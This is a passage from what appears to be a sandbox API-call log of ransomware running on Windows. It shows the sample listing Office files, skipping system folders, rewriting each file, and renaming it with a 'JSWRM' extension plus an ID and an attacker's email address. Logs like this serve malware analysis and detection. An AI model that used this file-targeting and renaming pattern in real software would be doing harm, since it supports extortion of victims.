hHeap=0x1e0000) returned 1 [0113.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0113.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0113.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0113.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_REVIEW.XSN" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_review.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.834] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20737) returned 1 [0113.834] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5100) returned 0x24c1d0 [0113.834] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x5100, lpOverlapped=0x0) returned 1 [0113.839] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.839] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x5100, lpOverlapped=0x0) returned 1 [0113.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.839] CloseHandle (hObject=0x238) returned 1 [0113.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0113.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0113.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0113.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0113.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0113.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0113.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.840] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_REVIEW.XSN" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_review.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_REVIEW.XSN.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_review.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0113.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0113.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0113.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0113.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0113.841] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf13e86a9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13e86a9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf145ad52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd270, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EAWFINTL.DLL", cAlternateFileName="")) returned 1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2=".") returned 1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="..") returned 1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="...") returned 1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="windows") returned -1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="recovery") returned -1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="perflogs") returned -1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="documents and settings") returned 1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="system volume information") returned -1 [0113.841] lstrcmpiW (lpString1="EAWFINTL.DLL", lpString2="msocache") returned -1 [0113.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAWFINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAWFINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EAWFINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAWFINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAWFINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EAWFINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0113.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0113.841] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef9fabe6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef9fabe6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6870, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EntityPickerIntl.dll", cAlternateFileName="ENTITY~1.DLL")) returned 1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2=".") returned 1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="..") returned 1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="...") returned 1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="windows") returned -1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="recovery") returned -1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="perflogs") returned -1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="documents and settings") returned 1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="$RECYCLE.BIN") returned 1 [0113.841] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="system volume information") returned -1 [0113.842] lstrcmpiW (lpString1="EntityPickerIntl.dll", lpString2="msocache") returned -1 [0113.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPickerIntl.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPickerIntl.dll", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EntityPickerIntl.dll", lpUsedDefaultChar=0x0) returned 20 [0113.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPickerIntl.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0113.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPickerIntl.dll", cchWideChar=20, lpMultiByteStr=0x241218, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EntityPickerIntl.dll", lpUsedDefaultChar=0x0) returned 20 [0113.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0113.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0113.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0113.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.842] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41cdbc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41f3e26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4a68, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ENVELOPR.DLL", cAlternateFileName="")) returned 1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2=".") returned 1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="..") returned 1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="...") returned 1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="windows") returned -1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="recovery") returned -1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="perflogs") returned -1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="documents and settings") returned 1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="system volume information") returned -1 [0113.843] lstrcmpiW (lpString1="ENVELOPR.DLL", lpString2="msocache") returned -1 [0113.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPR.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0113.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPR.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPR.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0113.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0113.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0113.843] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45f3450, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45f3450, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x45f3450, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6a3, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EQPLIST.VRD", cAlternateFileName="")) returned 1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2=".") returned 1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="..") returned 1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="...") returned 1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="windows") returned -1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="recovery") returned -1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="perflogs") returned -1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="documents and settings") returned 1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="$RECYCLE.BIN") returned 1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="system volume information") returned -1 [0113.843] lstrcmpiW (lpString1="EQPLIST.VRD", lpString2="msocache") returned -1 [0113.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0113.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EQPLIST.VRD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EQPLIST.VRD", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EQPLIST.VRD", lpUsedDefaultChar=0x0) returned 11 [0113.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0113.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EQPLIST.VRD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EQPLIST.VRD", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EQPLIST.VRD", lpUsedDefaultChar=0x0) returned 11 [0113.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0113.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0113.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0113.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eqplist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.844] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1699) returned 1 [0113.844] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6a0) returned 0x22d530 [0113.845] ReadFile (in: hFile=0x238, lpBuffer=0x22d530, nNumberOfBytesToRead=0x6a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x6a0, lpOverlapped=0x0) returned 1 [0113.846] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.846] WriteFile (in: hFile=0x238, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x6a0, lpOverlapped=0x0) returned 1 [0113.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0113.846] CloseHandle (hObject=0x238) returned 1 [0113.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0113.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0113.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0113.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0113.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0113.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.847] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eqplist.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EQPLIST.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eqplist.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0113.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0113.848] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1945af2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9a2c10c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x173da8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EXCEL.HXS", cAlternateFileName="")) returned 1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2=".") returned 1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="..") returned 1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="...") returned 1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="windows") returned -1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="recovery") returned -1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="perflogs") returned -1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="documents and settings") returned 1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="$RECYCLE.BIN") returned 1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="system volume information") returned -1 [0113.848] lstrcmpiW (lpString1="EXCEL.HXS", lpString2="msocache") returned -1 [0113.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0113.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.HXS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL.HXS", lpUsedDefaultChar=0x0) returned 9 [0113.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0113.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 